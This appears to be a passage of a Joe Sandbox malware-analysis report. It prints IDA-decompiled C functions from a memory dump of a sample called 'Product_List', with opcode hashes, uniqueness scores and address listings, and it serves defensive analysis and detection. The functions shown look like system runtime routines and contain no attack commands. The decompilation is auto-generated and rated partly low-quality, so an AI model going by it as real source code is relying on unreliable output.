                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: 8e0954fccfe4e2138a47b17012edc2a9ff098b8d1297b64006b50d3e8d2f4717
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: 93018F72300984DFEB27875CC988F66FBD8EF85B50F0900A9FA19CBA51E628DC40C621
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01831074 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E01831074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L0183165E(__ebx, 0x1858ae4, (__edx -  *0x1858b04 >> 0x14) + (__edx -  *0x1858b04 >> 0x14), __edi, __ecx, (__edx -  *0x1858b04 >> 0x14) + (__edx -  *0x1858b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L0182AFDE( &_v8,  &_v12);
				if(E01787D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L0181FE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                                                      0x01831074
                                                      0x01831080
                                                      0x01831082
                                                      0x0183108a
                                                      0x0183108f
                                                      0x01831093
                                                      0x018310a8
                                                      0x018310ab
                                                      0x018310ab
                                                      0x018310b0
                                                      0x018310b7
                                                      0x018310be
                                                      0x018310c3
                                                      0x018310cf
                                                      0x018310e1
                                                      0x018310d1
                                                      0x018310da
                                                      0x018310da
                                                      0x018310e9
                                                      0x018310f5
                                                      0x018310f5
                                                      0x018310fe

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c74d573e2b94ed0688cc1f758c29949513f6f46fc1e0488a9b04d9f6abc034c9
                                                      • Instruction ID: 5588129ad6333a4b9be9653e6b1334e3795f6c085a0375a9ada595dfdb7a6344
                                                      • Opcode Fuzzy Hash: c74d573e2b94ed0688cc1f758c29949513f6f46fc1e0488a9b04d9f6abc034c9
                                                      • Instruction Fuzzy Hash: 1F0128726047429BC711EF6DC908B1ABBD9ABC4710F088529F985D3690EE34D644CBE3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01838A62 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E01838A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x185d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L017AB640(E017A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                                                      0x01838a62
                                                      0x01838a71
                                                      0x01838a79
                                                      0x01838a82
                                                      0x01838a85
                                                      0x01838a89
                                                      0x01838a8c
                                                      0x01838a8f
                                                      0x01838a92
                                                      0x01838a95
                                                      0x01838a9f
                                                      0x01838ab1
                                                      0x01838aa1
                                                      0x01838aaa
                                                      0x01838aaa
                                                      0x01838abc
                                                      0x01838abd
                                                      0x01838abf
                                                      0x01838ada

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4df44370e19a146d7abdbef6a22b5402a9691d40a6474418d9ad878210aec402
                                                      • Instruction ID: a52b64b435ad8263a6b23434ccd7a93b7b0813b65753c0bddfc4294824c6b4f7
                                                      • Opcode Fuzzy Hash: 4df44370e19a146d7abdbef6a22b5402a9691d40a6474418d9ad878210aec402
                                                      • Instruction Fuzzy Hash: AE017C71A0121DAFCB00DFA8D9459EEFBB8EF88300F50415AFA01E7341E634AA01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176DB60 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0176DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0176DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L0176E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0176E8B0(__ecx, _t14, 0xfff);
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                      0x0176db64
                                                      0x0176db66
                                                      0x0176db6b
                                                      0x0176dbaa
                                                      0x0176db71
                                                      0x0176db76
                                                      0x0176db7a
                                                      0x0176dba3
                                                      0x0176db7c
                                                      0x0176db87
                                                      0x0176db8b
                                                      0x017c4fa1
                                                      0x017c4fb3
                                                      0x017c4fb8
                                                      0x0176db91
                                                      0x0176db96
                                                      0x0176db98
                                                      0x0176db98
                                                      0x0176db8b
                                                      0x0176db7a
                                                      0x0176db9d
                                                      0x0176dba2

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: eb95da477fa2475a9925786316b6798a0d92061079a524d818d35194232658d7
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: 75F0C8333515239BD3326AD9C884F17FA9E8F92A60F190035BA499B64CCD608C0296E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176B1E1 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0176B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01787D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01787D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E017E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                      0x0176b1e8
                                                      0x0176b1ea
                                                      0x0176b1f3
                                                      0x017c4a17
                                                      0x0176b1f9
                                                      0x0176b1f9
                                                      0x0176b1f9
                                                      0x0176b201
                                                      0x017c4a21
                                                      0x017c4a2e
                                                      0x00000000
                                                      0x00000000
                                                      0x017c4a3b
                                                      0x017c4a4d
                                                      0x017c4a3d
                                                      0x017c4a46
                                                      0x017c4a46
                                                      0x017c4a55
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0176b20a
                                                      0x0176b20a
                                                      0x0176b20a
                                                      0x0176b20a

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: 49eedf1783a41088b4143d46e5c686901ad895e1129ed4a0706a527cf06dd043
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: 7001AD32244680EFD326966DC808B69FBD8EF52B50F0800A9EE16CB6A2D678C9408224
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0182131B Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E0182131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x185d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01787D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L017AB640(E017A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                      0x0182131b
                                                      0x0182132a
                                                      0x01821330
                                                      0x01821336
                                                      0x0182133e
                                                      0x01821341
                                                      0x01821344
                                                      0x0182134f
                                                      0x01821361
                                                      0x01821351
                                                      0x0182135a
                                                      0x0182135a
                                                      0x0182136c
                                                      0x0182136d
                                                      0x0182136f
                                                      0x01821387

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a99e021cdb0eab6ab7a042a488f20081ba3fea6c132fbc158776f681fb4a1e4
                                                      • Instruction ID: 57dca5b16b11a542c0abe83f5fdf95faff4a718709efabc3d0ab9bc00d5a29a2
                                                      • Opcode Fuzzy Hash: 2a99e021cdb0eab6ab7a042a488f20081ba3fea6c132fbc158776f681fb4a1e4
                                                      • Instruction Fuzzy Hash: AF011971A01259AFCB04EFA9D549AAEB7F4EF58700F50415AF905EB381E6349A40CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0178C577 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0178C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0178C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E018388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                      0x0178c577
                                                      0x0178c57d
                                                      0x0178c581
                                                      0x0178c5b5
                                                      0x0178c5b9
                                                      0x0178c5ce
                                                      0x0178c5ce
                                                      0x0178c5ca
                                                      0x00000000
                                                      0x0178c5ca
                                                      0x0178c5c4
                                                      0x0178c5c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0178c5ad
                                                      0x00000000
                                                      0x0178c5af

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 512db8385d7ea73ad59f6fafb33eb94eaa5e4ab9efa8329374a48bca3275cbd3
                                                      • Instruction ID: a3947a02815773dccfcf3146bb35681a31b5ca975bba3fa28040f8cc57972cf2
                                                      • Opcode Fuzzy Hash: 512db8385d7ea73ad59f6fafb33eb94eaa5e4ab9efa8329374a48bca3275cbd3
                                                      • Instruction Fuzzy Hash: 2DF090B29956909FEF37B71C8004BA1FFD49B05670F7484A6E51587502C7A4D880C271
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01838D34 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E01838D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x185d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01787D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L017AB640(E017A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}













                                                      0x01838d34
                                                      0x01838d43
                                                      0x01838d4b
                                                      0x01838d4e
                                                      0x01838d52
                                                      0x01838d5c
                                                      0x01838d6e
                                                      0x01838d5e
                                                      0x01838d67
                                                      0x01838d67
                                                      0x01838d79
                                                      0x01838d7a
                                                      0x01838d7c
                                                      0x01838d94

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73bbbd17e2c2b04ed0d08810ac542754c35c1b01467677cb1cce41f45915dbc5
                                                      • Instruction ID: 6db1d5300130196e71311826863f67a329b6992c950bc3dd642d66811ea7ec1e
                                                      • Opcode Fuzzy Hash: 73bbbd17e2c2b04ed0d08810ac542754c35c1b01467677cb1cce41f45915dbc5
                                                      • Instruction Fuzzy Hash: 07F0B470A0460C9FDB14EFB8D549A6EB7B4EF54300F908199F905EB281EA34DA00CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01822073 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E01822073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0181FD22(__ecx);
				_t19 =  *0x185849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1858748; // 0x0
					if(__eflags <= 0) {
						L01821C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1858724 & 0x00000004;
							if(( *0x1858724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1858724; // 0x0
					return E01818DF1(__ebx, 0xc0000374, 0x1855890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                      0x01822076
                                                      0x01822078
                                                      0x0182207d
                                                      0x01822083
                                                      0x018220a4
                                                      0x018220aa
                                                      0x018220ac
                                                      0x018220b7
                                                      0x018220ba
                                                      0x018220bc
                                                      0x018220c9
                                                      0x018220c9
                                                      0x018220d0
                                                      0x018220d2
                                                      0x00000000
                                                      0x018220d2
                                                      0x018220be
                                                      0x018220c3
                                                      0x018220c5
                                                      0x018220c7
                                                      0x00000000
                                                      0x00000000
                                                      0x018220c7
                                                      0x018220bc
                                                      0x018220d4
                                                      0x01822085
                                                      0x01822085
                                                      0x018220a3
                                                      0x018220a3

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45d5b5a4361c9ed8f4d0339f67729335a2bd9b88295c6a2d45027d46a889e219
                                                      • Instruction ID: 6f4887b7de0cf416d589a323c00a2829ad78a910d8f3a56b276c3578e06ed345
                                                      • Opcode Fuzzy Hash: 45d5b5a4361c9ed8f4d0339f67729335a2bd9b88295c6a2d45027d46a889e219
                                                      • Instruction Fuzzy Hash: 8AF0A02B8152A54ADF336B2D61013E23FD7D756310B590486D990DB209C53C8BD3CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A927A Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E017A927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E017AFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017A92C6(_t11, _t14);
				}
				return _t11;
			}





                                                      0x017a9295
                                                      0x017a9299
                                                      0x017a929f
                                                      0x017a92aa
                                                      0x017a92ad
                                                      0x017a92ae
                                                      0x017a92af
                                                      0x017a92b0
                                                      0x017a92b4
                                                      0x017a92bb
                                                      0x017a92bb
                                                      0x017a92c5

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: 41e900b0bb2c16728ab9112cd3e0880e171aaecf59faf37b6ea9c81bb9a51952
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: 9EE02B323405016BE7119E09CC84F47B75DDFD2724F004078F6001E282C6E5DD1887A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0178746D Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E0178746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0177EB70(__ecx, 0x18579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                      0x0178746d
                                                      0x0178746d
                                                      0x0178746d
                                                      0x01787471
                                                      0x01787488
                                                      0x017cf92d
                                                      0x0178748e
                                                      0x01787491
                                                      0x01787495
                                                      0x017cf937
                                                      0x017cf93a
                                                      0x017cf94e
                                                      0x017cf953
                                                      0x017cf956
                                                      0x017cf956
                                                      0x01787495
                                                      0x00000000
                                                      0x01787488
                                                      0x01787473
                                                      0x01787478
                                                      0x0178747d
                                                      0x01787481
                                                      0x00000000
                                                      0x01787481
                                                      0x0178747d
                                                      0x0178747a
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e6a4e389f01bed681410e9c0f0c95c3ea879701a5e6fe93dcb03c39eb99aa86
                                                      • Instruction ID: a56f2af82e141030708b55019f8a16b3f06885f5c459dc8b0cc55ef631fe10c0
                                                      • Opcode Fuzzy Hash: 4e6a4e389f01bed681410e9c0f0c95c3ea879701a5e6fe93dcb03c39eb99aa86
                                                      • Instruction Fuzzy Hash: F5F0E934580149AADF0AB76CC840F79FFB1AF04794F644299D96BAF161E7649800C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01838CD6 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E01838CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x185d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01787D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				return L017AB640(E017A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                      0x01838ce5
                                                      0x01838ced
                                                      0x01838cf0
                                                      0x01838cfb
                                                      0x01838d0d
                                                      0x01838cfd
                                                      0x01838d06
                                                      0x01838d06
                                                      0x01838d18
                                                      0x01838d19
                                                      0x01838d1b
                                                      0x01838d33

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 098167679d938617538b17b7e5277d7b6f4bece71395e0d2da90ac92fa0b18b0
                                                      • Instruction ID: e3452ce50db2ab849f2f4ac9fa36c73f933fedd9e62508677017e001bf9fcfdd
                                                      • Opcode Fuzzy Hash: 098167679d938617538b17b7e5277d7b6f4bece71395e0d2da90ac92fa0b18b0
                                                      • Instruction Fuzzy Hash: 84F08270A04209ABDB04EBB8D949EAEB7B4EF59304F540299F916EB285EA34DA00C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01838B58 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E01838B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x185d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01787D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L017AB640(E017A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                      0x01838b67
                                                      0x01838b6f
                                                      0x01838b72
                                                      0x01838b7d
                                                      0x01838b8f
                                                      0x01838b7f
                                                      0x01838b88
                                                      0x01838b88
                                                      0x01838b9a
                                                      0x01838b9b
                                                      0x01838b9d
                                                      0x01838bb5

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 422f32dd41c78c791005d4ab6d23efe772ae0cbbb5e2fdb798d31938095de853
                                                      • Instruction ID: 18416e67fce50892da76b84d9fef87e4d379790dd4d31bf36847184a3f65652b
                                                      • Opcode Fuzzy Hash: 422f32dd41c78c791005d4ab6d23efe772ae0cbbb5e2fdb798d31938095de853
                                                      • Instruction Fuzzy Hash: 16F082B0A04259ABDB14EBA8D90AE6EB7B4EF44304F540599BA05DB381EA34DA00C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179A44B Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0179A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1857b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E017AFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                      0x0179a44b
                                                      0x0179a453
                                                      0x0179a472
                                                      0x0179a476
                                                      0x00000000
                                                      0x0179a493
                                                      0x0179a47a
                                                      0x0179a47f
                                                      0x0179a486
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3020d05315870295e8d8428d71002bd543da27f7d899a5e2f09d0b18f25b6e63
                                                      • Instruction ID: 8f78ec7ec1422e16770d4ddbe082a3b467d3c09340e083141e7444404f2ad636
                                                      • Opcode Fuzzy Hash: 3020d05315870295e8d8428d71002bd543da27f7d899a5e2f09d0b18f25b6e63
                                                      • Instruction Fuzzy Hash: 1AE09272B42422ABD3215A18BC00F66B39DDBE5A51F0A4035E605C7224D668DE05C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176F358 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
